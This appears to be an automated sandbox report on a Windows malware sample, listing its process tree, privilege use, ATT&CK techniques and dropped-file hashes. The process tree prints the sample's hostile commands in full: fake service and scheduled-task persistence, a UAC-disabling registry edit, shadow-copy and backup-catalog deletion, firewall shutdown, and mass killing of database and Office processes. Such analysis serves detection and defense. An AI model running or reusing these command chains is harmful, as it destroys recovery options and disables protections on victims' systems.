Token: SeBackupPrivilege	360	WMIC.exe
Token: SeRestorePrivilege	360	WMIC.exe
Token: SeShutdownPrivilege	360	WMIC.exe
Token: SeDebugPrivilege	360	WMIC.exe
Token: SeSystemEnvironmentPrivilege	360	WMIC.exe
Token: SeRemoteShutdownPrivilege	360	WMIC.exe
Token: SeUndockPrivilege	360	WMIC.exe
Token: SeManageVolumePrivilege	360	WMIC.exe
Token: 33	360	WMIC.exe
Token: 34	360	WMIC.exe
Token: 35	360	WMIC.exe
Token: SeIncreaseQuotaPrivilege	360	WMIC.exe
Token: SeSecurityPrivilege	360	WMIC.exe
Token: SeTakeOwnershipPrivilege	360	WMIC.exe
Token: SeLoadDriverPrivilege	360	WMIC.exe
Token: SeSystemProfilePrivilege	360	WMIC.exe
Token: SeSystemtimePrivilege	360	WMIC.exe
Token: SeProfSingleProcessPrivilege	360	WMIC.exe
Token: SeIncBasePriorityPrivilege	360	WMIC.exe
Token: SeCreatePagefilePrivilege	360	WMIC.exe
Token: SeBackupPrivilege	360	WMIC.exe
Token: SeRestorePrivilege	360	WMIC.exe
Token: SeShutdownPrivilege	360	WMIC.exe
Token: SeDebugPrivilege	360	WMIC.exe
Token: SeSystemEnvironmentPrivilege	360	WMIC.exe
Token: SeRemoteShutdownPrivilege	360	WMIC.exe
Token: SeUndockPrivilege	360	WMIC.exe
Token: SeManageVolumePrivilege	360	WMIC.exe
Token: 33	360	WMIC.exe
Token: 34	360	WMIC.exe
Token: 35	360	WMIC.exe
Token: SeDebugPrivilege	1384	tasklist.exe
Token: SeDebugPrivilege	1768	taskkill.exe
Token: SeDebugPrivilege	1276	taskkill.exe
Token: SeDebugPrivilege	1812	taskkill.exe
Token: SeDebugPrivilege	360	taskkill.exe
Token: SeDebugPrivilege	1016	taskkill.exe
Token: SeDebugPrivilege	1060	taskkill.exe
Token: SeDebugPrivilege	888	taskkill.exe
Token: SeDebugPrivilege	824	taskkill.exe
Token: SeDebugPrivilege	1608	tasklist.exe
Token: SeDebugPrivilege	1084	taskkill.exe
Token: SeDebugPrivilege	596	taskkill.exe
Token: SeDebugPrivilege	2020	taskkill.exe
Token: SeDebugPrivilege	1808	taskkill.exe
Token: SeDebugPrivilege	772	taskkill.exe
Token: SeDebugPrivilege	996	taskkill.exe
Token: SeDebugPrivilege	1716	taskkill.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.execmd.execmd.execmd.execmd.execmd.execmd.exeWScript.exe

description	pid	process	target process
PID 544 wrote to memory of 1540	544	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe	cmd.exe
PID 544 wrote to memory of 1540	544	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe	cmd.exe
PID 544 wrote to memory of 1540	544	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe	cmd.exe
PID 544 wrote to memory of 1540	544	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe	cmd.exe
PID 1540 wrote to memory of 976	1540	cmd.exe	tasklist.exe
PID 1540 wrote to memory of 976	1540	cmd.exe	tasklist.exe
PID 1540 wrote to memory of 976	1540	cmd.exe	tasklist.exe
PID 1540 wrote to memory of 976	1540	cmd.exe	tasklist.exe
PID 1540 wrote to memory of 2040	1540	cmd.exe	findstr.exe
PID 1540 wrote to memory of 2040	1540	cmd.exe	findstr.exe
PID 1540 wrote to memory of 2040	1540	cmd.exe	findstr.exe
PID 1540 wrote to memory of 2040	1540	cmd.exe	findstr.exe
PID 544 wrote to memory of 1688	544	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe	cmd.exe
PID 544 wrote to memory of 1688	544	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe	cmd.exe
PID 544 wrote to memory of 1688	544	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe	cmd.exe
PID 544 wrote to memory of 1688	544	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe	cmd.exe
PID 1688 wrote to memory of 1640	1688	cmd.exe	sc.exe
PID 1688 wrote to memory of 1640	1688	cmd.exe	sc.exe
PID 1688 wrote to memory of 1640	1688	cmd.exe	sc.exe
PID 1688 wrote to memory of 1640	1688	cmd.exe	sc.exe
PID 544 wrote to memory of 1352	544	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe	cmd.exe
PID 544 wrote to memory of 1352	544	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe	cmd.exe
PID 544 wrote to memory of 1352	544	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe	cmd.exe
PID 544 wrote to memory of 1352	544	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe	cmd.exe
PID 1352 wrote to memory of 1496	1352	cmd.exe	sc.exe
PID 1352 wrote to memory of 1496	1352	cmd.exe	sc.exe
PID 1352 wrote to memory of 1496	1352	cmd.exe	sc.exe
PID 1352 wrote to memory of 1496	1352	cmd.exe	sc.exe
PID 544 wrote to memory of 1792	544	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe	cmd.exe
PID 544 wrote to memory of 1792	544	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe	cmd.exe
PID 544 wrote to memory of 1792	544	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe	cmd.exe
PID 544 wrote to memory of 1792	544	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe	cmd.exe
PID 1792 wrote to memory of 1648	1792	cmd.exe	sc.exe
PID 1792 wrote to memory of 1648	1792	cmd.exe	sc.exe
PID 1792 wrote to memory of 1648	1792	cmd.exe	sc.exe
PID 1792 wrote to memory of 1648	1792	cmd.exe	sc.exe
PID 544 wrote to memory of 1296	544	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe	cmd.exe
PID 544 wrote to memory of 1296	544	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe	cmd.exe
PID 544 wrote to memory of 1296	544	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe	cmd.exe
PID 544 wrote to memory of 1296	544	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe	cmd.exe
PID 544 wrote to memory of 1460	544	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe	cmd.exe
PID 544 wrote to memory of 1460	544	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe	cmd.exe
PID 544 wrote to memory of 1460	544	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe	cmd.exe
PID 544 wrote to memory of 1460	544	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe	cmd.exe
PID 1460 wrote to memory of 1676	1460	cmd.exe	WScript.exe
PID 1460 wrote to memory of 1676	1460	cmd.exe	WScript.exe
PID 1460 wrote to memory of 1676	1460	cmd.exe	WScript.exe
PID 1460 wrote to memory of 1676	1460	cmd.exe	WScript.exe
PID 544 wrote to memory of 1672	544	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe	cmd.exe
PID 544 wrote to memory of 1672	544	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe	cmd.exe
PID 544 wrote to memory of 1672	544	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe	cmd.exe
PID 544 wrote to memory of 1672	544	6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe	cmd.exe
PID 1672 wrote to memory of 1488	1672	cmd.exe	schtasks.exe
PID 1672 wrote to memory of 1488	1672	cmd.exe	schtasks.exe
PID 1672 wrote to memory of 1488	1672	cmd.exe	schtasks.exe
PID 1672 wrote to memory of 1488	1672	cmd.exe	schtasks.exe
PID 1676 wrote to memory of 1380	1676	WScript.exe	cmd.exe
PID 1676 wrote to memory of 1380	1676	WScript.exe	cmd.exe
PID 1676 wrote to memory of 1380	1676	WScript.exe	cmd.exe
PID 1676 wrote to memory of 1380	1676	WScript.exe	cmd.exe
PID 1676 wrote to memory of 1752	1676	WScript.exe	cmd.exe
PID 1676 wrote to memory of 1752	1676	WScript.exe	cmd.exe
PID 1676 wrote to memory of 1752	1676	WScript.exe	cmd.exe
PID 1676 wrote to memory of 1752	1676	WScript.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe
"C:\Users\Admin\AppData\Local\Temp\6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe"
1⤵
- Drops startup file
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:544

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c tasklist /v /fo csv | findstr /i "dcdcf"
2⤵
- Suspicious use of WriteProcessMemory
PID:1540

C:\Windows\SysWOW64\tasklist.exe
tasklist /v /fo csv
3⤵
- Enumerates processes with tasklist
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:976

C:\Windows\SysWOW64\findstr.exe
findstr /i "dcdcf"
3⤵
PID:2040

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto
2⤵
- Suspicious use of WriteProcessMemory
PID:1688

C:\Windows\SysWOW64\sc.exe
sc create SqlBakup binPath= "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start=auto
3⤵
- Launches sc.exe
PID:1640

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
2⤵
- Suspicious use of WriteProcessMemory
PID:1352

C:\Windows\SysWOW64\sc.exe
sc create SqlBakup binPath= "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
3⤵
- Launches sc.exe
PID:1496

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sc create SqlBakup binPath= "C:\Documents and Settings\Admin\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
2⤵
- Suspicious use of WriteProcessMemory
PID:1792

C:\Windows\SysWOW64\sc.exe
sc create SqlBakup binPath= "C:\Documents and Settings\Admin\Start Menu\Programs\Startup\Xinfecter.exe" start= auto
3⤵
- Launches sc.exe
PID:1648

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ver
2⤵
PID:1296

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&S-2153.bat
2⤵
- Suspicious use of WriteProcessMemory
PID:1460

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\S-8459.vbs"
3⤵
- Suspicious use of WriteProcessMemory
PID:1676

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /C echo C:\Users\Admin\AppData\S-6748.bat
4⤵
PID:1380

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Admin\AppData\S-6748.bat" "
4⤵
PID:1752

C:\Windows\SysWOW64\tasklist.exe
tasklist /v
5⤵
- Enumerates processes with tasklist
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:624

C:\Windows\SysWOW64\find.exe
find /I /c "dcdcf"
5⤵
PID:1856

C:\Windows\SysWOW64\vssadmin.exe
vssadmin.exe Delete Shadows /All /Quiet
5⤵
- Interacts with shadow copies
PID:1864

C:\Windows\SysWOW64\timeout.exe
timeout /t 15 /nobreak
5⤵
- Delays execution with timeout.exe
PID:1160

C:\Windows\SysWOW64\tasklist.exe
tasklist /fi "ImageName eq 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe" /fo csv
5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1540

C:\Windows\SysWOW64\find.exe
find /I "6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe"
5⤵
PID:1816

C:\Windows\SysWOW64\timeout.exe
timeout /t 15 /nobreak
5⤵
- Delays execution with timeout.exe
PID:1492

C:\Windows\SysWOW64\tasklist.exe
tasklist /fi "ImageName eq 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe" /fo csv
5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1192

C:\Windows\SysWOW64\find.exe
find /I "6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe"
5⤵
PID:1768

C:\Windows\SysWOW64\timeout.exe
timeout /t 15 /nobreak
5⤵
- Delays execution with timeout.exe
PID:1088

C:\Windows\SysWOW64\tasklist.exe
tasklist /fi "ImageName eq 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe" /fo csv
5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1384

C:\Windows\SysWOW64\find.exe
find /I "6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe"
5⤵
PID:1060

C:\Windows\SysWOW64\timeout.exe
timeout /t 15 /nobreak
5⤵
- Delays execution with timeout.exe
PID:1128

C:\Windows\SysWOW64\tasklist.exe
tasklist /fi "ImageName eq 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe" /fo csv
5⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1608

C:\Windows\SysWOW64\find.exe
find /I "6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe"
5⤵
PID:1204

C:\Windows\SysWOW64\timeout.exe
timeout /t 15 /nobreak
5⤵
- Delays execution with timeout.exe
PID:972

C:\Windows\SysWOW64\tasklist.exe
tasklist /fi "ImageName eq 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe" /fo csv
5⤵
- Enumerates processes with tasklist
PID:1016

C:\Windows\SysWOW64\find.exe
find /I "6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe"
5⤵
PID:1076

C:\Windows\SysWOW64\timeout.exe
timeout /t 15 /nobreak
5⤵
- Delays execution with timeout.exe
PID:468

C:\Windows\SysWOW64\tasklist.exe
tasklist /fi "ImageName eq 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe" /fo csv
5⤵
- Enumerates processes with tasklist
PID:888

C:\Windows\SysWOW64\find.exe
find /I "6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe"
5⤵
PID:840

C:\Windows\SysWOW64\timeout.exe
timeout /t 15 /nobreak
5⤵
- Delays execution with timeout.exe
PID:904

C:\Windows\SysWOW64\tasklist.exe
tasklist /fi "ImageName eq 6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe" /fo csv
5⤵
- Enumerates processes with tasklist
PID:1792

C:\Windows\SysWOW64\find.exe
find /I "6612cf82da05701ed9262f598724a9435b015890a79aa0e928c53e4e6702bf08.exe"
5⤵
PID:568

C:\Windows\SysWOW64\timeout.exe
timeout /t 15 /nobreak
5⤵
- Delays execution with timeout.exe
PID:1492

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\S-2153.bat'" /f
2⤵
- Suspicious use of WriteProcessMemory
PID:1672

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\Admin\AppData\S-2153.bat'" /f
3⤵
- Creates scheduled task(s)
PID:1488

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c echo %date%-%time%
2⤵
PID:1508

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c systeminfo|find /i "os name"
2⤵
PID:1060

C:\Windows\SysWOW64\systeminfo.exe
systeminfo
3⤵
- Gathers system information
PID:1692

C:\Windows\SysWOW64\find.exe
find /i "os name"
3⤵
PID:1716

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c systeminfo|find /i "original"
2⤵
PID:824

C:\Windows\SysWOW64\systeminfo.exe
systeminfo
3⤵
- Gathers system information
PID:744

C:\Windows\SysWOW64\find.exe
find /i "original"
3⤵
PID:1184

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ver
2⤵
PID:1256

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes&wbadmin delete catalog -quiet
2⤵
PID:1672

C:\Windows\SysWOW64\reg.exe
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
3⤵
- UAC bypass
- Modifies registry key
PID:684

C:\Windows\SysWOW64\vssadmin.exe
vssadmin.exe Delete Shadows /All /Quiet
3⤵
- Interacts with shadow copies
PID:1596

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic shadowcopy delete
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:360

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall set currentprofile state off
3⤵
- Modifies Windows Firewall
PID:1608

C:\Windows\SysWOW64\netsh.exe
netsh firewall set opmode mode=disable
3⤵
- Modifies Windows Firewall
PID:1392

C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes
3⤵
- Modifies Windows Firewall
PID:528

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c taskkill /im msftesql.exe&taskkill /im sqlagent.exe&taskkill /im sqlbrowser.exe&taskkill /im sqlservr.exe&taskkill /im sqlwriter.exe&taskkill /im oracle.exe&taskkill /im ocssd.exe&taskkill /im dbsnmp.exe&taskkill /im synctime.exe&taskkill /im agntsvc.exe&taskkill /im mydesktopqos.exe&taskkill /im isqlplussvc.exe&taskkill /im xfssvccon.exe&taskkill /im mydesktopservice.exe&taskkill /im ocautoupds.exe&taskkill /im agntsvc.exe&taskkill /im encsvc.exe&taskkill /im firefoxconfig.exe&taskkill /im tbirdconfig.exe&taskkill /im ocomm.exe&taskkill /im mysqld.exe&taskkill /im mysqld-nt.exe&taskkill /im mysqld-opt.exe&taskkill /im dbeng50.exe&taskkill /im sqbcoreservice.exe&taskkill /im excel.exe&taskkill /im infopath.exe&taskkill /im msaccess.exe&taskkill /im mspub.exe&taskkill /im onenote.exe&taskkill /im outlook.exe&taskkill /im powerpnt.exe&taskkill /im steam.exe&taskkill /im thebat.exe&taskkill /im thebat64.exe&taskkill /im thunderbird.exe&taskkill /im visio.exe&taskkill /im winword.exe&taskkill /im wordpad.exe
2⤵
PID:1472

C:\Windows\SysWOW64\taskkill.exe
taskkill /im msftesql.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1768

C:\Windows\SysWOW64\taskkill.exe
taskkill /im sqlagent.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1276

C:\Windows\SysWOW64\taskkill.exe
taskkill /im sqlbrowser.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1812

C:\Windows\SysWOW64\taskkill.exe
taskkill /im sqlservr.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:360

C:\Windows\SysWOW64\taskkill.exe
taskkill /im sqlwriter.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1016

C:\Windows\SysWOW64\taskkill.exe
taskkill /im oracle.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1060

C:\Windows\SysWOW64\taskkill.exe
taskkill /im ocssd.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:888

C:\Windows\SysWOW64\taskkill.exe
taskkill /im dbsnmp.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:824

C:\Windows\SysWOW64\taskkill.exe
taskkill /im synctime.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1084

C:\Windows\SysWOW64\taskkill.exe
taskkill /im agntsvc.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:596

C:\Windows\SysWOW64\taskkill.exe
taskkill /im mydesktopqos.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2020

C:\Windows\SysWOW64\taskkill.exe
taskkill /im isqlplussvc.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1808

C:\Windows\SysWOW64\taskkill.exe
taskkill /im xfssvccon.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:772

C:\Windows\SysWOW64\taskkill.exe
taskkill /im mydesktopservice.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:996

C:\Windows\SysWOW64\taskkill.exe
taskkill /im ocautoupds.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1716

C:\Windows\SysWOW64\taskkill.exe
taskkill /im agntsvc.exe
3⤵
- Kills process with taskkill
PID:1616

C:\Windows\SysWOW64\taskkill.exe
taskkill /im encsvc.exe
3⤵
- Kills process with taskkill
PID:2008

C:\Windows\SysWOW64\taskkill.exe
taskkill /im firefoxconfig.exe
3⤵
- Kills process with taskkill
PID:840

C:\Windows\SysWOW64\taskkill.exe
taskkill /im tbirdconfig.exe
3⤵
- Kills process with taskkill
PID:1128

C:\Windows\SysWOW64\taskkill.exe
taskkill /im ocomm.exe
3⤵
- Kills process with taskkill
PID:568

C:\Windows\SysWOW64\taskkill.exe
taskkill /im mysqld.exe
3⤵
- Kills process with taskkill
PID:1256

C:\Windows\SysWOW64\taskkill.exe
taskkill /im mysqld-nt.exe
3⤵
- Kills process with taskkill
PID:432

C:\Windows\SysWOW64\taskkill.exe
taskkill /im mysqld-opt.exe
3⤵
- Kills process with taskkill
PID:596

C:\Windows\SysWOW64\taskkill.exe
taskkill /im dbeng50.exe
3⤵
- Kills process with taskkill
PID:660

C:\Windows\SysWOW64\taskkill.exe
taskkill /im sqbcoreservice.exe
3⤵
- Kills process with taskkill
PID:1276

C:\Windows\SysWOW64\taskkill.exe
taskkill /im excel.exe
3⤵
- Kills process with taskkill
PID:912

C:\Windows\SysWOW64\taskkill.exe
taskkill /im infopath.exe
3⤵
- Kills process with taskkill
PID:1272

C:\Windows\SysWOW64\taskkill.exe
taskkill /im msaccess.exe
3⤵
- Kills process with taskkill
PID:1076

C:\Windows\SysWOW64\taskkill.exe
taskkill /im mspub.exe
3⤵
- Kills process with taskkill
PID:1124

C:\Windows\SysWOW64\taskkill.exe
taskkill /im onenote.exe
3⤵
- Kills process with taskkill
PID:1636

C:\Windows\SysWOW64\taskkill.exe
taskkill /im outlook.exe
3⤵
- Kills process with taskkill
PID:1732

C:\Windows\SysWOW64\taskkill.exe
taskkill /im powerpnt.exe
3⤵
- Kills process with taskkill
PID:1392

C:\Windows\SysWOW64\taskkill.exe
taskkill /im steam.exe
3⤵
- Kills process with taskkill
PID:1408

C:\Windows\SysWOW64\taskkill.exe
taskkill /im thebat.exe
3⤵
- Kills process with taskkill
PID:1688

C:\Windows\SysWOW64\taskkill.exe
taskkill /im thebat64.exe
3⤵
- Kills process with taskkill
PID:1196

C:\Windows\SysWOW64\taskkill.exe
taskkill /im thunderbird.exe
3⤵
- Kills process with taskkill
PID:1820

C:\Windows\SysWOW64\taskkill.exe
taskkill /im visio.exe
3⤵
- Kills process with taskkill
PID:1724

C:\Windows\SysWOW64\taskkill.exe
taskkill /im winword.exe
3⤵
- Kills process with taskkill
PID:820

C:\Windows\SysWOW64\taskkill.exe
taskkill /im wordpad.exe
3⤵
- Kills process with taskkill
PID:1384

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1044

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1

T1053

Persistence

New Service

1

T1050

Modify Existing Service

1

T1031

Scheduled Task

1

T1053

Privilege Escalation

Bypass User Account Control

1

T1088

New Service

1

T1050

Scheduled Task

1

T1053

Defense Evasion

Bypass User Account Control

1

T1088

Disabling Security Tools

1

T1089

Modify Registry

2

T1112

File Deletion

2

T1107

Credential Access

Discovery

Query Registry

1

T1012

Peripheral Device Discovery

1

T1120

System Information Discovery

3

T1082

Process Discovery

1

T1057

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Inhibit System Recovery

2

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\S-2153.bat
Filesize
138B

MD5
82a528cbf39b8ea7e2982e7b2305204c

SHA1
717836e0e2b304ed7ae239cc1db0f6f80e0419b1

SHA256
616738526c38e04f992b7b9fc60cb7feb3ee416bf47b69aa2c3a5f1a722a653b

SHA512
eff7654e171dbd9bc471718a7e14ee3c84a9edf948f4c8863c8107e653be8ba06bc7a2876d506d6e4ae7ef2280e820d04615ebcd88894ef01b3667d070241db3

Download Submit
C:\Users\Admin\AppData\S-6748.bat
Filesize
2KB

MD5
3dba4c2dba3286a09d0b8ee61569f602

SHA1
4fb2a73854fad23f26d08c76fdda4e2268ea5f9e

SHA256
89d549b2862e20141b0b25ed7165a00e27ed865c6fb78be56393b8395465f5c7

SHA512
054c3c7ff25534a4b24f03ec62aa38c0f8352948d350f008f1b7beb3c72ea3c495fcb8c3194d9bfc3fffc363c2bca5c05d520942c063d450127c188afc2ba0d0

Download Submit
C:\Users\Admin\AppData\S-8459.vbs
Filesize
686B

MD5
ed7a274ff8ac640416952bfb5d6c927a

SHA1
6b33cd5b39db6e9a900336e446f64a137f0a0f42

SHA256
4d68e4a7a437eb4a7ad9c7b28bdda894a68ae41efba8a5e4d3a6a930bebfeea5

SHA512
8f3a4f071550afe716c5d39601cf1e8559084fbb701e95b28eb7685fed6d8a972e662ad19124a2242fd30c291b8dd1f18f1a2dcf56ac6c98f2bf96bac91510f3

Download Submit
memory/360-97-0x0000000000000000-mapping.dmp

Download
memory/360-111-0x0000000000000000-mapping.dmp

Download
memory/528-105-0x0000000000000000-mapping.dmp

Download
memory/544-54-0x0000000076151000-0x0000000076153000-memory.dmp

Filesize
8KB

Download
memory/596-120-0x0000000000000000-mapping.dmp

Download
memory/624-76-0x0000000000000000-mapping.dmp

Download
memory/684-95-0x0000000000000000-mapping.dmp

Download
memory/744-88-0x0000000000000000-mapping.dmp

Download
memory/772-123-0x0000000000000000-mapping.dmp

Download
memory/824-115-0x0000000000000000-mapping.dmp

Download
memory/824-87-0x0000000000000000-mapping.dmp

Download
memory/888-114-0x0000000000000000-mapping.dmp

Download
memory/972-119-0x0000000000000000-mapping.dmp

Download
memory/976-56-0x0000000000000000-mapping.dmp

Download
memory/996-124-0x0000000000000000-mapping.dmp

Download
memory/1016-112-0x0000000000000000-mapping.dmp

Download
memory/1060-80-0x0000000000000000-mapping.dmp

Download
memory/1060-100-0x0000000000000000-mapping.dmp

Download
memory/1060-113-0x0000000000000000-mapping.dmp

Download
memory/1084-116-0x0000000000000000-mapping.dmp

Download
memory/1088-93-0x0000000000000000-mapping.dmp

Download
memory/1128-101-0x0000000000000000-mapping.dmp

Download
memory/1160-83-0x0000000000000000-mapping.dmp

Download
memory/1184-89-0x0000000000000000-mapping.dmp

Download
memory/1192-91-0x0000000000000000-mapping.dmp

Download
memory/1204-118-0x0000000000000000-mapping.dmp

Download
memory/1256-90-0x0000000000000000-mapping.dmp

Download
memory/1276-109-0x0000000000000000-mapping.dmp

Download
memory/1296-64-0x0000000000000000-mapping.dmp

Download
memory/1352-60-0x0000000000000000-mapping.dmp

Download
memory/1380-73-0x0000000000000000-mapping.dmp

Download
memory/1384-99-0x0000000000000000-mapping.dmp

Download
memory/1392-103-0x0000000000000000-mapping.dmp

Download
memory/1460-65-0x0000000000000000-mapping.dmp

Download
memory/1472-107-0x0000000000000000-mapping.dmp

Download
memory/1488-71-0x0000000000000000-mapping.dmp

Download
memory/1492-86-0x0000000000000000-mapping.dmp

Download
memory/1496-61-0x0000000000000000-mapping.dmp

Download
memory/1508-79-0x0000000000000000-mapping.dmp

Download
memory/1540-84-0x0000000000000000-mapping.dmp

Download
memory/1540-55-0x0000000000000000-mapping.dmp

Download
memory/1596-96-0x0000000000000000-mapping.dmp

Download
memory/1608-117-0x0000000000000000-mapping.dmp

Download
memory/1608-98-0x0000000000000000-mapping.dmp

Download
memory/1616-126-0x0000000000000000-mapping.dmp

Download
memory/1640-59-0x0000000000000000-mapping.dmp

Download
